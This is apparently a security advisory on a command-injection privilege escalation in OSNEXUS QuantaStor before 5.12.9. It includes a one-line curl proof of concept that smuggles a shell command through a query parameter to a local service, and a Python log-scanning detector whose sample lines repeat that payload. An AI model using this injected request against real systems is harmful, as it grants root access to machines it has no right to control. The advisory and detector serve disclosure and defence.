Advisory

Upgrade to the latest version of OSNEXUS QuantaStor.

Technical details

An issue was discovered in OSNEXUS QuantaStor before 5.12.9 that allows local privilege escalation to root. Chained with an SSRF, it could become remote code execution. The following request to the local service on port 8154 demonstrates the issue:

curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami>/tmp/aaa`'
Privilege escalation
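
A detection check for the request shown above, added here as an example and not part of the original advisory or of QuantaStor: it scans web access-log lines for requests to /qstor/qs_upgrade.py whose parameters decode to shell metacharacters. The combined-log line format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import unquote, unquote_plus, urlsplit

TARGET_PATH = "/qstor/qs_upgrade.py"            # path taken from the advisory's request
SHELL_META = re.compile(r"[;`|&<>\r\n]|\$\(")   # characters a shell treats specially
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # assumed combined-log request field


def suspicious_params(url):
    """Return [(name, decoded_value)] for parameters carrying shell metacharacters."""
    parts = urlsplit(url)
    if unquote(parts.path) != TARGET_PATH:
        return []
    hits = []
    # Split on '&' before decoding so an encoded '&' (%26) stays inside its value.
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        decoded = unquote_plus(value)
        if SHELL_META.search(decoded):
            hits.append((unquote_plus(name), decoded))
    return hits


def flag_requests(lines):
    """Return [(line_number, param_name, decoded_value)] for every flagged request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                findings.append((number, name, value))
    return findings


# Constructed sample log lines (hypothetical format and timestamps).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:00:00:01 +0000] '
    '"GET /qstor/qs_upgrade.py?taskId=1&a=;`whoami>/tmp/aaa` HTTP/1.1" 200 12',
    '127.0.0.1 - - [01/Jan/2024:00:00:02 +0000] '
    '"GET /qstor/qs_upgrade.py?taskId=1&a=%3B%60whoami%3E%2Ftmp%2Faaa%60 HTTP/1.1" 200 12',
    '127.0.0.1 - - [01/Jan/2024:00:00:03 +0000] '
    '"GET /qstor/qs_upgrade.py?taskId=1 HTTP/1.1" 200 12',
    '127.0.0.1 - - [01/Jan/2024:00:00:04 +0000] "GET /index.html?q=a;b HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in flag_requests(SAMPLE_LOG):
        print(finding)
```

The same check applies to any proxy or gateway log that could carry an SSRF-relayed request to this path, since the advisory notes that an SSRF would make the issue remotely reachable.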